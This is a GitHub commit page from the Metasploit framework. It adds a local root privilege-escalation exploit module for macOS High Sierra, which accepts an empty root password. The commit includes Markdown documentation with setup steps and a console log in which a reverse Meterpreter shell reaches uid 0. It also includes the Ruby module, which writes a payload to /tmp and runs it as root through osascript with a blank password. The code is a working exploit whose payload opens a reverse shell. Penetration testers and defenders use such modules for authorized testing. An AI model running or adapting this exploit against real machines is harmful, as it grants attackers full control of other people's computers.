Skip to content

Commit

Permalink
Land rapid7#9255, add local exploit for osx root login with no password
Browse files Browse the repository at this point in the history
bwatters-r7 committed Nov 29, 2017

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
2 parents e73ba0b + 9dc3d60 commit c695828
Showing 2 changed files with 159 additions and 0 deletions.
104 changes: 104 additions & 0 deletions documentation/modules/exploit/osx/local/root_no_password.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,104 @@
## Vulnerable Application
This vulnerability works against OSX 10.13 (High Sierra). Early
research (https://objective-see.com/blog/blog_0x24.html) suggests that
the vulnerability is the result of multiple errors ultimately started by
an incorrect return value from triggered by the function
`od_verify_crypt_password` returning true even if the account is
disabled. The subsequent function calls appear to validate and create
the password, though there is still a lot of research into the bug and
these results should be verified once more research has been published.

## Verification Steps
1. Get a session on a vulnerable system
2. `use exploit/osx/local/root_no_password`
3. `set lhost <IP>`
4. `set lport <PORT>`
5. `set session <session_id>`
6. `run`

## Scenarios
### Example Run
```
msf exploit(psexec) > use exploit/multi/handler
msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
httpserver[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <OSX_IP>:49347) at 2017-11-29 07:28:32 -0600
meterpreter > sysinfo
Computer : msfusers-Mac.local
OS : (MacOSX 17.0.0)
Architecture : x64
Meterpreter : x64/osx
meterpreter > getuid
Server username: uid=501, gid=20, euid=501, egid=20
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/osx/local/root_no_password
msf exploit(root_no_password) > show options
Module options (exploit/osx/local/root_no_password):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (osx/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Mac OS X 10.13.1 High Sierra x64 (Native Payload)
msf exploit(root_no_password) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(root_no_password) > set lport 4562
lport => 4562
msf exploit(root_no_password) > set session 1
session => 1
msf exploit(root_no_password) > run
[*] Started reverse TCP handler on <MSF_IP>:4562
[*] Writing payload file as '/tmp/cinbvsmrmyxw'
[*] Meterpreter session 2 opened (<MSF_IP>:4562 -> <OSX_IP>:62522) at 2017-11-29 07:29:56 -0600
[*] <OSX_IP> - Meterpreter session 2 closed. Reason: Died
[*] Executing payload file as '/tmp/cinbvsmrmyxw'
[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target
[-] Invalid session identifier: 2
msf exploit(root_no_password) >
msf exploit(root_no_password) >
msf exploit(root_no_password) > run
[*] Started reverse TCP handler on <MSF_IP>:4562
[*] Writing payload file as '/tmp/imtjkakowanv'
[*] Executing payload file as '/tmp/imtjkakowanv'
[*] Meterpreter session 3 opened (<MSF_IP>:4562 -> <OSX_IP>:49348) at 2017-11-29 07:30:53 -0600
[+] Deleted /tmp/imtjkakowanv
meterpreter > sysinfo
Computer : msfusers-Mac.local
OS : (MacOSX 17.0.0)
Architecture : x64
Meterpreter : x64/osx
meterpreter > getuid
Server username: uid=0, gid=20, euid=0, egid=20
meterpreter >
```
55 changes: 55 additions & 0 deletions modules/exploits/osx/local/root_no_password.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => 'Mac OS X Root Privilege Escalation',
'Description' => %q{
This module exploits a serious flaw in MacOSX High Sierra.
Any user can login with user "root", leaving an empty password.
},
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
[ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
[ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
],
'Platform' => 'osx',
'Arch' => ARCH_X64,
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
},
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
[ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 29 2017'
))
end

def exploit_cmd(root_payload)
"osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
end

def exploit
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
print_status("Writing payload file as '#{payload_file}'")
write_file(payload_file, payload.raw)
register_file_for_cleanup(payload_file)
output = cmd_exec("chmod +x #{payload_file}")
print_status("Executing payload file as '#{payload_file}'")
cmd_exec(exploit_cmd(payload_file))
end
end

0 comments on commit c695828

Please sign in to comment.